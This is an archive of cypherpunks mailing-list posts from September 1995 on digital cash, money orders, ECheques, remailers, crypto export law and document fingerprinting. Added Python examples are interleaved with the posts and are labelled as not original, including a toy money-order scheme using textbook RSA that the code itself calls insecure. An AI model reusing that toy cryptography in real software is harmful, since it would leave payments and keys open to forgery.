order containing cash that has other properties, too.

If the payee really trusts the trustee, then no race to exchange the cash
is needed--hiding the payee further.  The payee can exchange it over a
period of time or as needed.  Exchange includes indirect exchange as in
buying money orders.

I'm new to protocols and I mention details below only to add hopefully
clarifying material, not to suggest that I have any idea of the right ways
to do these things.  These can be implemented using PGP.

Money Order:
The automated trustee checks the money (for money order amount and fee).
If it is bad the trustee sends it back.  Otherwise, the trustee exchanges
the cash and then selects from cash on hand cash of the amount of the money
order.  This is encrypted for the payee.  (The buyer must supply something
the trustee would know how to use to encrypt for the payee: public key or
message addressed to the trustee containing information on how to encrypt
for the payee.)  The money is encrypted with that.  A description is added
to this and it is signed by the trustee and sent back to the payer.  The
description may or may not mention the payee depending on whether the money
was wrapped with a public key or not.

Escrowed Money Order:
The trustee creates a money order that can be opened by either the payer or
payee and encrypts that for the escrow agent.  A description and signature
is added.

Generalization:
Payees and escrow agents can be abstract recipients such as and/or lists.

I wonder how much I could charge for this.

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================
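
The money-order exchange described in the message above, as an added example; it is not part of the original post and not any list member's code. Textbook RSA over small fixed primes stands in for PGP and is not secure, and the unit-coin model, the one-coin fee and every name below are assumptions.

```python
import hashlib
import secrets


def rsa_keypair(p, q, e=65537):
    """Textbook RSA from two known primes. Toy parameters, not secure."""
    n = p * q
    return (n, e), (n, pow(e, -1, (p - 1) * (q - 1)))


def rsa_apply(value, key):
    n, exponent = key
    return pow(value, exponent, n)


def _digest(text, n):
    return int.from_bytes(hashlib.sha256(text.encode()).digest(), "big") % n


def sign(text, private_key):
    return rsa_apply(_digest(text, private_key[0]), private_key)


def verify(text, signature, public_key):
    return rsa_apply(signature, public_key) == _digest(text, public_key[0])


def describe(sealed):
    """The description the trustee signs. It names no payee."""
    return f"money order: {len(sealed)} unit coins; sealed={sealed}"


class Bank:
    """Issues unit coins and exchanges them; an exchanged coin is dead."""

    def __init__(self):
        self.live = set()

    def issue(self):
        coin = secrets.randbits(64)
        self.live.add(coin)
        return coin

    def exchange(self, coins):
        """Swap coins for fresh ones, or return None if any coin is a
        duplicate, unknown, or already exchanged (a double spend)."""
        if len(set(coins)) != len(coins) or not set(coins) <= self.live:
            return None
        self.live -= set(coins)
        return [self.issue() for _ in coins]


class Trustee:
    FEE = 1  # unit coins charged per money order (assumed)

    def __init__(self, bank, cash_on_hand=8):
        self.bank = bank
        self.public, self._private = rsa_keypair(2**61 - 1, 2**89 - 1)
        self.cash = [bank.issue() for _ in range(cash_on_hand)]

    def money_order(self, coins, amount, payee_public):
        """Return a signed order, or None (cash sent back) if payment is bad."""
        if amount < 1 or len(coins) != amount + self.FEE or amount > len(self.cash):
            return None
        fresh = self.bank.exchange(coins)  # double spending surfaces here
        if fresh is None:
            return None
        # Pay out of cash already on hand, not the coins just exchanged.
        bundle, self.cash = self.cash[:amount], self.cash[amount:] + fresh
        sealed = [rsa_apply(coin, payee_public) for coin in bundle]
        return {"sealed": sealed, "signature": sign(describe(sealed), self._private)}


def open_order(order, trustee_public, payee_private):
    """Payee side: check the trustee's signature, then unseal the coins."""
    if not verify(describe(order["sealed"]), order["signature"], trustee_public):
        return None
    return [rsa_apply(c, payee_private) for c in order["sealed"]]
```

The payee never contacts the bank before accepting: the trustee's signature over the sealed coins is the only check, so the payee can exchange them later and at leisure.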






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Sep 95 11:14:05 PDT
To: cypherpunks@toad.com
Subject: Crypto + Economics + AI = Digital Money Economies
Message-ID: <ac7f084d0b0210048e66@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Dar Scott proposes some extensions to digital cash to deal with the issues
being discussed here. He mentions "money orders" and "escrowed money
orders," and he alludes to "trustees," or agents that would behave in
certain well-defined ways.

This is as good a place as any to address a point I've been thinking about
for a long while, and which I've touched on before. Namely, that the
"ontology" of digital money, the instruments and forms it can take, are
_impoverished_ compared to the real world.

In my eight years of following digital cash work, I've been struck with how
little _economics_ enters the fray. Many of the protocols that seem to have
problems from a purely cryptographic point of view seem to get fixed when
additional _economic_ considerations are included (the consideration we
cite the most is "reputation," and we debate this endlessly). The PGP "web
of trust" is a kind of example of this additional consideration, if we make
certain fairly reasonable assumptions about the nature of collusion. (Lots
of stuff to get into here, but I want to make some other points and not get
too sidetracked.)

"Digital money" currently has only a few ways of dealing with transfers of
value in transactions. A lot of the problems come, in my view, from this
relatively spartan set of "primitives."

Where are the cryptographic equivalents of:

- money orders

- promissory notes

- receipts

- warrants

- lockboxes

- bearer bonds

- options

- time deposits

- coupons

- escrow

- IOUs

- zero coupon bonds

- checks

...and so on. The terms in any good dictionary of financial terms (such as
the "MIT Dictionary of Modern Economics," ed. by David Pearce, 1992). (Many
of these things are built up out of more basic things, with mix-ins from
other classes, or with modified methods.)

A look at any book on money and finance shows a rich "microworld" of
"things" and "procedures" (classes and methods attached to classes). The
classes have subclasses, and the methods have various behaviors and
"expectations" attached (more than just simple class behavior, more of an
AI or agent flavor, in my view).

(AI is somewhat of a dirty word these days, due to hyped expectations. But
many of the methods have been useful in limited domains. The domain of
financial transactions, with the classes and methods hinted at above,
involve a lot of formal manipulations and expected behaviors.)

In the real world, as the "base class" of "things traded" (tangible assets)
reached various limits, a new class of "money" was created, where money was
gold, silver, spices, etc., that could be more easily transported and
stored. And so on, through levels of abstraction (marks on clay tablets,
entries in ledger books, issuances of certificates, bonds, derivatives,
etc.)

My point is not to recap views of the history of money in its many forms,
or even to give my views on the "ontology of money," but to say that many
of the problems we think are present in current digital money systems may
largely result from the impoverished set of base classes of digital money.

To me, an exciting project is to take the basic cryptographic protocols and
build up more structured objects (blobs, envelopes, seals, etc.), and then
incorporate these into even more complicated financial instruments.

There have been proposals for crypto class libraries, most recently in Ray
Cromwell's detailed plan for C++ crypto classes. Others I have been in
communication with have expressed interest in doing the same thing in
Smalltalk, given that many financial companies are doing a lot of their
complicated transactions in Smalltalk. And Java has just entered the
scene....

My point is not to argue for any particular language approach, or even to
argue for this "ontology of digital money" as a Cypherpunks project, but to
share with you some thoughts.

I think significant progress will have been achieved when these "financial
objects" can be launched and used without a lot of hand-tuning and human
intervention. In fact, an "economic microworld" of agents/actors
interacting and trading in various forms of digital cash and derivatives
would be an exciting "artificial life" example, and one which would test
the robustness of protocols. I don't think this is beyond the current state
of the art by too much.

I'm working on bits and pieces of this, but progress has been slow....

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@law.miami.edu>
Date: Fri, 15 Sep 95 08:15:42 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: DD, pedophiles, and Terrorists, oh my
In-Reply-To: <199509150908.CAA22145@ix3.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950915111440.12462D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


FOIA doesn't work for stuff pertaining to ongoing LEA activity or cases 
pending in court.  (simplified summary of complex rule)

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Hemming CEO MarketNet"  <JohnHemming@mkn.co.uk> (by way ofrah@shipwright.com (Robert Hettinga))
Date: Fri, 15 Sep 95 08:23:21 PDT
To: cypherpunks@toad.com
Subject: More on ECheques
Message-ID: <v02120d01ac7f4a0f2771@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Version 0.1 (beta) of WorkHorse has now been put on the ftp site together
with instructions as to how to use it to pay for things with ECheques.

You are welcome to test ECheques on our live floristry service.  To
do this:

1.  Download WorkHorse ftp://193.119.26.70/mktnet/pub/horse.zip
2.  Follow the instructions for generating a key.
       a) Generate Key  System/security/key gen (please use 512 bits)
       b) Specify your user details Alter/my details (put in a bank a/c no)
3.  Don't worry about registering the key (unless you really want the
     flowers and have a BankNet account)
4.  Try
     http://alpha.mkn.co.uk/load ordflow   .. or
     http://beta.mkn.co.uk/load ordflow   .. or
     http://epsilon.mkn.co.uk/load ordflow
5.  Don't fill in credit card details .   Please put a name of Test or
     testing.  Click the button for ECheque (or electronic cheque)
6.  Send the form.

If you can easily trace the conversation it will be interesting.  The
system will automatically go into SSL with 128 bit RC4.  It will generate
a signed instruction and transmit that in the secure session.  If you want
to see how the form works save the html source.  You can set it up
on another server and receive the signed instruction yourself if you
want.  You can use workhorse to check the signature.

(The first live ECheque was issued on Wednesday).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@dxm.org>
Date: Fri, 15 Sep 95 11:58:47 PDT
To: rishab@infinity.c2.org
Subject: "Use implies consent to monitoring"
Message-ID: <199509151853.LAA10932@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



In the InterNIC notice on fees for domain names that marks the end
of an era, (http://rs.internic.net/announcements/fee-policy.html)
I noticed this gem of a postscript:

   Please be advised that use constitutes consent to monitoring

     (Elec Comm Priv Act, 18 USC 2701-2711).


----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 09:23:02 PDT
To: fair@clock.org
Subject: Re: NSA on GAK
Message-ID: <9509151622.AA08762@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Yeah, really.  I didn't say it isn't true, I just said it's more like a
cute quote than truth.

Compare the number of bits downloaded in TCP/IP and routing infrastructure
to the number of bits that are purchased at the store or via a P.O.
Minuscule.
	r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Fri, 15 Sep 95 22:30:29 PDT
To: cypherpunks@toad.com
Subject: Re: Digital Fingerprinting
Message-ID: <m0stpnG-00066MC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


On 12 Sep 95 at 11:27, Andrew Loewenstern wrote:


> Such technology would be very useful in business, especially the
> high-tech  industry.  Think of how many non-disclosure agreements
> are signed every day  relating to new products developed for the
> software industry alone.  Many  companies are very paranoid and
> already 'fingerprint' information by using  unique code-names for
> projects, for instance.  i.e. the spec sheet on their  new GAK
> crypto product they give to Alice may be code-named 'project foobar'
>  but the one they give to Bob may be code-named 'project burris'... 
> Then,  when the information leaks out they check which person they
> gave the document  with that code-name and they know who to sue (or
> at least not give any more  trade-secrets to).  It's very simplistic
> but it has been known to work in the  past.
> 
> Most of the real technology for doing this is much better, of
> course...   However, what stops you from printing out a
> fingerprinted document and  scanning it back in, for instance?

Well, there is selective wording, misspellings, punctuation and
formatting. These can be corrected easily if allowed to be
transported as a text or common file type.

Another  way is to place the document in a PItA proprietary graphical
format for transport and viewing only, stego identifier imbedded if
you chose * , so that every portion of the document has some
identifier imbedded in it. Many obvious and many devious. Electronic
drawings with a harmless and useless circuit(s) added on , software
with do nothing code (by design!:) ).  Difficult and time consuming
to do, but for megabuck items, no prob. Automated for an additional
fee of course. Start a service industry for such, make money, pay me
back by running a fast, reliable remailer.

Idea is to make the thief go to some major effort and if the scanning
option is used to make the deletions  as obvious and telling as the
former identifier.

> andrew

note* Makes a neat way of putting copyright & source  information in picture and 
sound files, somewhat useless but every trip up helps.
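
The wording-based fingerprint discussed in this message, as an added example; it is not code from either poster. Each recipient's copy picks one of two wordings at six slots, and recipients get codewords that differ in at least three slots, so a leak is still traced after one wording is "corrected" or part of the text is cut. The spec-sheet text, the recipient names and all function names are constructed for illustration.

```python
import re

# Constructed spec-sheet text. Each {n} slot has two interchangeable wordings.
TEMPLATE = ("The {0} ships in {1}. It {2} a 64-bit session key and {3} key "
            "escrow. Field trials {4} next month. Pricing is {5}.")
VARIANTS = [
    ("device", "unit"),
    ("the third quarter", "Q3"),
    ("uses", "employs"),
    ("supports", "permits"),
    ("begin", "start"),
    ("undecided", "not yet set"),
]
SLOTS = len(VARIANTS)


def codewords(count, min_distance=3):
    """Greedily pick codewords that pairwise differ in at least
    `min_distance` slots, so a few edited or missing slots cannot turn
    one recipient's copy into another's."""
    chosen = []
    for candidate in range(2 ** SLOTS):
        if all(bin(candidate ^ c).count("1") >= min_distance for c in chosen):
            chosen.append(candidate)
            if len(chosen) == count:
                return chosen
    raise ValueError("too many recipients for this many wording slots")


def assign(recipients):
    """Map each recipient to a codeword, stored as one bit per slot."""
    return {name: [(word >> i) & 1 for i in range(SLOTS)]
            for name, word in zip(recipients, codewords(len(recipients)))}


def make_copy(bits):
    """Render the document with the wording each bit selects."""
    return TEMPLATE.format(*(VARIANTS[i][b] for i, b in enumerate(bits)))


def observe(leaked):
    """Bit seen at each slot; None where neither or both wordings appear."""
    seen = []
    for first, second in VARIANTS:
        hit0 = re.search(r"\b" + re.escape(first) + r"\b", leaked, re.I)
        hit1 = re.search(r"\b" + re.escape(second) + r"\b", leaked, re.I)
        seen.append(None if bool(hit0) == bool(hit1) else int(bool(hit1)))
    return seen


def trace(table, leaked):
    """Rank recipients by how many observed slots contradict their copy."""
    seen = observe(leaked)
    scores = {name: sum(1 for s, b in zip(seen, bits)
                        if s is not None and s != b)
              for name, bits in table.items()}
    best = min(scores.values())
    return {"suspects": sorted(n for n, s in scores.items() if s == best),
            "mismatches": best,
            "slots_seen": sum(s is not None for s in seen)}
```

With distance three, one altered slot or two missing slots still leaves a single suspect; a shorter excerpt can return several names, which is why `suspects` is a list.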
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.COM>
Date: Fri, 15 Sep 95 12:39:37 PDT
To: cypherpunks@toad.com
Subject: San Diego Cypherpunks Physical Meeting
Message-ID: <9509151530.aa12455@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


San Diego Area CPUNKS symposium  Thursday, Sep. 21, 1995

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop" where I hope to get an update of Lance Cottrell's new
anonymous e-mail server, "mixmaster", exchange keys. 

   Don't forget to bring your public key  fingerprint.  If you can figure
out how to get it on the back of a business card, that would be cool.  

Hopefully Lance Cottrell will give us an update on Mixmaster 2.0.2

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your fingerprint.

Drop me a note if you plan to attend.

NOTE: My e-mail address, "chris.claborne@sandiegoca.attgis.com" permanently
replaces my .ncr.com address.  Both addresses work for now but NCR address will
eventually be killed.  

     2
 -- C  --

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 15 Sep 95 12:37:02 PDT
To: nelson@crynwr.com (Russell Nelson)
Subject: RE: Mixmaster status
Message-ID: <ac7f83b2010210043757@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:58 AM 9/15/95, Russell Nelson wrote:
<SNIP>
>   While I have not discussed it, I can not imagine that there would not also
>   be a free version of the server code (with source). Without remailers what
>   is the point of the client software?
>
>I'm confused here.  Isn't every copy of mixmaster potentially a client
>and/or server?  That seems to me to be one of the beautiful aspects of
>mixmaster -- run a remailer and you greatly increase your own privacy.
>
>

I would like to see that continue, although I think that the Windows and Mac
versions are likely to be client only. Since I am putting my reputation
behind those statements, I don't want to box myself in.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 15 Sep 95 04:43:58 PDT
To: rsalz@org.osf
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <9509151114.AA07872@sulphur.osf.org>
Message-ID: <10345.9509151143@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> > [using inline images to display theoretically ITAR violating gifs]
> 
> Inline images are not references -- they are part of the page being
> retrieved.  
>
> >	<img src="http://www.dcs.ex.ac.uk/~aba/obscura/rsa.gif">
> >So that the image is *imported* by the *viewer*, and not supplied by
> >www.obscura.
> 
> I would advise him to edit the page so it reads
>
>	Click <A HREF="http://www.dcs.ex.ac.uk/~aba/obscura/rsa.gif">here
>	to see a picture of the shirt.

I wrote the page, Lance kindly provided www space which I set up, he's
seen it, and thought it funny even.  Sounds like you seriously think
this is a danger to Lance, something I hoped I avoided by using an
inline from outside the ITAR zone.

> Inlined images are just a convenient way of chunking.  The image is
> imported by the viewer because the server, as part of the base
> document, told it to do so.  You might be able to fool an ignorant
> court, but it still doesn't change the fact that Lance has a
> document that in the natural course of operation of the Web, exports
> crypto.

Weeell, I'm not so sure.  I mean the page says to view this page first
get this picture from here, this one from here, this text, format and
display.  It is not illegal to say *where* to get crypto, just illegal
to export it, right?  He hasn't exported it, just told the viewer
where to fetch it from.

I think this case is safer than the porn one, because the actual data
in this case is legal in both jurisdictions, it just must not be
transferred from jurisdiction US -> jurisdiction non-US, which it has
not been.

If it were something which were illegal in the US, hmm, let's say an
image of a slightly underage (underage under US definitions, not
dutch) dutch porn star, then having links to it might be argued as
incitement to view something which it would be illegal to view in the
US, something which is effectively illegal to import into the US.

I would agree with you were the information imported by way of an
inline image actually illegal in the US, as the person loading would
have no choice.  In such a case a disclaimer might be appropriate:

	warning, it may be illegal to import the following link into
	the US, I will not be responsible if you are in the US and
	click on this link

But what is there to disclaim with inline data which is itself legal
in both jurisdictions, and the only legal question being the transfer
of that data from US -> UK, which the protocol ensures does not
happen?

Browser in the US, text in US, crypto gif imported from UK, both legal.

Browser outside US, text in US, crypto gif imported from UK, both legal.

See a flaw in that?

Try that in France might be more interesting, where it really is
illegal to import crypto.

It's kind of theoretical, but an interesting argument... what happens
when this happens with porn, is perhaps a more tricky question, re
possible illegality of import from outside US, maybe in such cases you
should request the viewer to turn off autoload of images, so that they
must request them after reading the disclaimer text.  Or perhaps it
would be necessary to ensure that it never happens automatically
without the user clicking on a button certifying that they are not in
the US, the antithesis of MIT's I affirm I am a US citizen blah, blah,
that goes with getting PGP from their site (I didn't get it btw, I
just read the questions for my amusement).

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 15 Sep 95 09:57:16 PDT
To: <cypherpunks@toad.com>
Subject: Re: More on ECheques
Message-ID: <9509151657.AA12563@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Version 0.1 (beta) of WorkHorse has now been put on the ftp site together
> with instructions as to how to use it to pay for things with ECheques.
> 
> You are welcome to test ECheques on our live floristry service.  To
> do this:
> 
> 1.  Download WorkHorse ftp://193.119.26.70/mktnet/pub/horse.zip
> 2.  Follow the instructions for generating a key.
>        a) Generate Key  System/security/key gen (please use 512 bits)
>        b) Specify your user details Alter/my details (put in a bank a/c no)
[...]

If a random person called you on the phone, and asked for one of your
bank account numbers, would you give it to him/her?

 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Fri, 15 Sep 95 11:07:30 PDT
To: cypherpunks@toad.com
Subject: Applied Cryptography, Second Edition:  Ordering Information
Message-ID: <199509151807.NAA10561@subzero>
MIME-Version: 1.0
Content-Type: text



The SECOND EDITION of APPLIED CRYPTOGRAPHY is coming in November. 
This is a major rewrite: 50% more words, 7 more chapters, and
over 1600 references.  Not only did I make corrections to the
first edition and add developments since it was published, but I
also included topics left out of the first edition.  (See table
of contents--attached.)

The second edition has lots of new algorithms (including GOST,
Blowfish, RC4, and A5), more information on the Clipper Chip and
key escrow, dozens of new protocols, more information on how PGP
works, detailed information on key management and modes of
operation, and new source code.

The second edition will be published in paperback and hardcover. 
Right now I am making both available at a 15% discount.

*****************************************************************
                          ORDER FORM

Applied Cryptography, 2nd Edition (Hardcover): $70 * .85 = $59.00
Applied Cryptography, 2nd Edition (Softcover): $50 * .85 = $42.00

          Shipping:
                    Air (U.S.):       $5 per book
                    Surface (U.S.):   $3 per book
                    Canada/Mexico:    $7 per book
                    Everywhere else:  $9 per book

Send to:

          Counterpane Systems, 101 E Minnehaha Parkway,
                    Minneapolis, MN  55419

*****************************************************************

              APPLIED CRYPTOGRAPHY, SECOND EDITION
                       Table of Contents

((Sections in all capitals are either new or substantially
rewritten.))

Foreword by Whitfield Diffie

Preface

Chapter 1:  Foundations
          Terminology; STEGANOGRAPHY; Substitution Ciphers and
          Transposition Ciphers; Simple XOR; One-Time Pads; Computer
          Algorithms; Large Numbers

Part I:  Cryptographic Protocols

Chapter 2:  Protocol Building Blocks
          Introduction to Protocols; Communications using Symmetric
          Cryptography; One-Way Functions; One-Way Hash Functions;
          Communications using Public-Key Cryptography; Digital
          Signatures; Digital Signatures with Encryption; Random and
          Pseudo-Random Sequence Generation

Chapter 3:  Basic Protocols
          Key Exchange; Authentication; AUTHENTICATION AND KEY
          EXCHANGE; FORMAL ANALYSIS OF AUTHENTICATION AND KEY-EXCHANGE
          PROTOCOLS; Multiple-Key Public-Key Cryptography; Secret
          Splitting; Secret Sharing; Cryptographic Protection of
          Databases

Chapter 4:  Intermediate Protocols
          Timestamping Services; Subliminal Channel; Undeniable
          Digital Signatures; DESIGNATED CONFIRMER SIGNATURES; PROXY
          SIGNATURES; Group Signatures; Fail-Stop Digital Signatures;
          Computing with Encrypted Data; Bit Commitment; Fair Coin
          Flips; Mental Poker; ONE-WAY ACCUMULATORS; All-or-Nothing
          Disclosure of Secrets; KEY ESCROW

Chapter 5:  Advanced Protocols
          ZERO-KNOWLEDGE PROOFS; Zero-Knowledge Proofs of Identity;
          Blind Signatures; IDENTITY-BASED PUBLIC-KEY CRYPTOGRAPHY;
          Oblivious Transfer; OBLIVIOUS SIGNATURES; Simultaneous
          Contract Signing; Digital Certified Mail; Simultaneous
          Exchange of Secrets

Chapter 6:  Esoteric Protocols
          SECURE ELECTIONS; Secure Multiparty Computation; Anonymous
          Message Broadcast; DIGITAL CASH

Part II:  Cryptographic Techniques

Chapter 7:  Key Length
          SYMMETRIC KEY LENGTH; PUBLIC-KEY KEY LENGTH; COMPARING
          SYMMETRIC AND PUBLIC-KEY KEY LENGTH; BIRTHDAY ATTACKS
          AGAINST ONE-WAY HASH FUNCTIONS; How Long Should a Key Be?;
          Caveat Emptor

Chapter 8:  Key Management
          Generating Keys; NONLINEAR KEYSPACES; Transferring Keys;
          Verifying Keys; Using Keys; UPDATING KEYS; Storing Keys;
          Backup Keys; Compromised Keys; Lifetime of Keys; Destroying
          Keys; Public-Key Key Management

Chapter 9:  Algorithm Types and Modes
          Electronic Codebook Mode; Block Replay; Cipher Block
          Chaining Mode; Stream Ciphers; Self-Synchronizing Stream
          Ciphers; Cipher-Feedback Mode; Synchronous Stream Ciphers;
          Output-Feedback Mode; Counter Mode; Other Block-Cipher
          Modes; CHOOSING A CIPHER MODE; INTERLEAVING; Block Ciphers
          vs. Stream Ciphers

Chapter 10:  Using Algorithms
          Choosing an Algorithm; Public-Key Cryptography vs. Symmetric
          Cryptography; Encrypting Communications Channels; ENCRYPTING
          DATA FOR STORAGE; Hardware Encryption vs. Software
          Encryption; COMPRESSION, ENCODING, AND ENCRYPTION; DETECTING
          ENCRYPTION; HIDING CIPHERTEXT IN CIPHERTEXT; DESTROYING
          INFORMATION

Part III:  Cryptographic Algorithms

Chapter 11:  Mathematical Background
          Information Theory; Complexity Theory; NUMBER THEORY;
          FACTORING; Prime Number Generation; Discrete Logarithms in a
          Finite Field

Chapter 12:  Data Encryption Standard
          Background; Description of DES; Security of DES; 
          DIFFERENTIAL AND LINEAR CRYPTANALYSIS; THE REAL DESIGN
          CRITERIA; DES VARIANTS; HOW SECURE IS DES TODAY?

Chapter 13:  Other Block Algorithms
          Lucifer; Madryga; Newdes; Feal-N; Redoc; LOKI; Khufu and
          Khafre; RC2; Idea; Mmb; CA-1.1; SKIPJACK

Chapter 14:  Still Other Block Algorithms
          GOST; CAST; BLOWFISH; SAFER K-64; 3-WAY; CRAB; SXAL8/MBAL;
          RC5; OTHER BLOCK ALGORITHMS; THEORY OF BLOCK CIPHER DESIGN;
          USING ONE-WAY HASH FUNCTIONS; CHOOSING A BLOCK ALGORITHM

Chapter 15:  Combining Block Algorithms
          DOUBLE ENCRYPTION; TRIPLE ENCRYPTION; DOUBLING THE BLOCK
          LENGTH; OTHER MULTIPLE ENCRYPTION SCHEMES; CDMF KEY
          SHORTENING; WHITENING; CASCADING MULTIPLE BLOCK ALGORITHMS;
          COMBINING MULTIPLE BLOCK ALGORITHMS

Chapter 16:  Pseudo-Random-Sequence Generators and Stream Ciphers
          Linear Congruential Generators; Linear Feedback Shift
          Registers; LFSRs in Software; DESIGN AND ANALYSIS OF STREAM
          CIPHERS; Stream Ciphers using LFSRs; A5; HUGHES XPD/KPD;
          NANOTEQ; RAMBUTAN; ADDITIVE GENERATORS; GIFFORD; ALGORITHM
          M; PKZIP

Chapter 17:  Other Stream Ciphers and Real Random-Sequence Generators
          RC4; SEAL; WAKE; FEEDBACK WITH CARRY SHIFT REGISTERS; STREAM
          CIPHERS USING FCSRS; NONLINEAR FEEDBACK SHIFT REGISTERS; 
          Other Stream Ciphers; System-Theoretic Approach to Stream
          Cipher Design; Complexity-Theoretic Approach to Stream
          Cipher Design; Other Approaches to Stream Cipher Design;
          CASCADING MULTIPLE STREAM CIPHERS;  CHOOSING A STREAM
          CIPHER; GENERATING MULTIPLE STREAMS FROM A SINGLE PSEUDO-
          RANDOM SEQUENCE GENERATOR; REAL RANDOM-SEQUENCE GENERATORS

Chapter 18:  One-Way Hash Functions
          Background; Snefru; N-HASH; MD4; MD5; MD2; Secure Hash
          Algorithm (SHA); RIPE-MD; Haval; Other One-Way Hash
          Functions; ONE-WAY HASH FUNCTIONS USING SYMMETRIC BLOCK
          ALGORITHMS; Using Public-key Algorithms; CHOOSING A ONE-WAY
          HASH FUNCTION; MESSAGE AUTHENTICATION CODES

Chapter 19:  Public-Key Algorithms
          Background; Knapsack Algorithms; RSA; Pohlig-Hellman; Rabin;
          ElGamal; McEliece; Elliptic Curve Cryptosystems; LUC; FINITE
          AUTOMATON PUBLIC-KEY CRYPTOSYSTEMS

Chapter 20:  Public-Key Digital Signature Algorithms
          Digital Signature Algorithm (DSA); DSA VARIANTS; GOST
          DIGITAL SIGNATURE ALGORITHM; DISCRETE LOGARITHM SIGNATURE
          SCHEMES; Ong-Schnorr-Shamir; Esign; Cellular Automata; Other
          Public-Key Algorithms

Chapter 21:  Identification Schemes
          Feige-Fiat-Shamir; Guillou-Quisquater; Schnorr; CONVERTING
          IDENTIFICATION SCHEMES TO SIGNATURE SCHEMES

Chapter 22:  Key-Exchange Algorithms
          DIFFIE-HELLMAN; STATION-TO-STATION PROTOCOL; Shamir's Three-
          Pass Protocol; COMSET; Encrypted Key Exchange; FORTIFIED KEY
          NEGOTIATION; Conference Key Distribution and Secret
          Broadcasting

Chapter 23:  Special Algorithms for Protocols
          Multiple-Key Public-Key Cryptography; Secret Sharing
          Algorithms; Subliminal Channel; Undeniable Digital
          Signatures; DESIGNATED CONFIRMER SIGNATURES; Computing with
          Encrypted Data; Fair Coin Flips; ONE-WAY ACCUMULATORS; All-
          or-Nothing Disclosure of Secrets; FAIR AND FAILSAFE
          CRYPTOSYSTEMS; Zero-Knowledge Proofs of Knowledge; Blind
          Signatures; Oblivious Transfer; Secure Multiparty
          Computation; Probabilistic Encryption; Quantum Cryptography

Part IV:  The Real World

Chapter 24:  Example Implementations
          IBM Secret-Key Management Protocol; Mitrenet; ISDN; STU-III;
          Kerberos; KryptoKnight; SESAME; IBM COMMON CRYPTOGRAPHIC
          ARCHITECTURE; ISO Authentication Framework; Privacy-Enhanced
          Mail (PEM); Message Security Protocol; PRETTY GOOD PRIVACY
